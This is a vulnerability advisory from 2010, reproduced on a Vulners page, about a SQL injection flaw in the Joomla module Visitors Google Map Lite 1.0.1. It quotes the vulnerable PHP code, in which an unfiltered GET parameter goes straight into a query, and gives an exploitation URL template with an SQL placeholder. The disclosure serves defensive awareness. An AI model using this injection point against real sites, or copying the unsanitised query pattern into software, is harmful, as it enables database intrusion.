Vulners
Lucene search
Visitors Google Map Lite 1.0.1 mod_visitorsgooglemap SQL Injection
==================================================================
Visitors Google Map Lite 1.0.1 mod_visitorsgooglemap SQL Injection
==================================================================
- Discovered by : Chip D3 Bi0s
- Email : chipdebios[at]gmail[dot]com
- Group : LatinHackTeam
- Date : 2010-09-08
- Where : From Remote
-------------------------------------------------------------------------------------
Affected software description
Application : Visitors Google Map Lite 1.0.1 (FREE) (module:mod_visitorsgooglemap)
Developer : Serdar Gökkus
Compatibility : Joomla 1.5 Native
License : GPLv2 or later
Date Added : Sunday August 29, 2010 01:14:14
Download : http://www.comlantis.com/download/doc_download/2-visitors-google-map-lite-101-free.html
I. BACKGROUND
This extension tracks visitors of your site in real time and displays their
locations in Google Map. It uses three main technologies:
- Map API of Google
- AJAX
- IP geolocation API of IPInfoDB
Content of VisitorsGoogeMap Package:
This extension contains one Joomla Compoment and two Joomla Modules.
com_visitorsgooglemap: This component is responsible for the creation
database table during installation and remove
it clearly in case of uninstallation.
mod_visitorsgooglemap: This module is responsible for the display of
Google Map in desired module position in your
template and track the visitors of your Joomla
page in the map.
mod_visitorsgooglemap_agent: This module is responsible for the updating
visitors information in the database.
II. DESCRIPTION
Some sql injecton vulnerabilities exist in mod_visitorsgooglemap module .
III. ANALYSIS
The bug is in the following files, specifying the lines
/mod_visitorsgooglemap/map_data.php
[16] [if ($_GET['action'] == 'listpoints')
[17] {
[18] $lastMarkerID = $_GET['lastMarkerID'];
[19] ini_set('default_mimetype','text/xml'); // manchmal notwendig
[20] header ('Content-Type: text/xml'); // reicht nicht immer
[21] echo '<?xml version="1.0" ?>';
[22] echo '<xmlresponse>';
[23] $database =& JFactory::getDBO();
[24] $query = "SELECT * FROM #__visitorsgooglemap_location where id > $lastMarkerID order by id";
Explanation:As noted in the line [24] $ lastMarkerID
nowhere is filtered, which result in a query pede unexpected
IV. EXPLOITATION
http://site/path/modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0{sql}
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
# 0day.today [2018-03-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Sep 2010 00:00Current
7.1High risk
Vulners AI Score7.1